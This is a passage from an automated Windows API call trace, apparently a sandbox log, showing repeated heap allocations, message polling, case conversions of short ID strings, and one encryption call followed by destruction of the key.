wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0244.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0244.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0244.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0244.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0244.305] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.305] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0244.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0244.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0244.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0244.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0244.306] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.306] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.306] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0244.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0244.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0244.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0244.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0244.307] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0244.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0244.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0244.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0244.307] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x350f158*, pdwDataLen=0x8bef68*=0x26775, dwBufLen=0x26778 | out: pbData=0x350f158*, pdwDataLen=0x8bef68*=0x26778) returned 1 [0244.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0244.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0244.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0244.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0244.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0244.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0244.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0244.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0244.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0244.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0244.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0244.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0244.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0244.312] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.312] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0244.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0244.313] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0244.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0244.313] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0244.313] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0244.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0244.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0244.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0244.313] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0244.313] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.313] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0244.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0244.313] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0244.313] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0244.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0244.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0244.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0244.314] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0244.314] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.314] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0244.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0244.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0244.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0244.314] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.314] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0244.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0244.314] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0244.315] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0244.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0244.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0244.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0244.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0244.315] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0244.315] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.315] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0244.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0244.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0244.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0244.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0244.315] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.315] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.315] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0244.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0244.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0244.327] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0244.327] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.327] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0244.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0244.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0244.334] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0244.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0244.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0244.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0244.335] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0244.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0244.335] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0244.335] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0244.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0244.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0244.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0244.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0244.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0244.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0244.335] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0244.335] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0244.335] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0244.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0244.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0244.335] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.336] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0244.336] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.336] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0244.336] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0244.336] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0244.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0244.337] CryptDestroyKey (hKey=0xaa5920) returned 1 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0244.337] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0244.337] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0244.337] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0244.337] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0244.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0244.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0244.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0244.338] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0244.338] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0244.338] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0244.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0244.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0244.338] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0244.338] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0244.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0244.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0244.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0244.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0244.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0244.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0244.338] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0244.339] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0244.339] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0244.339] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, 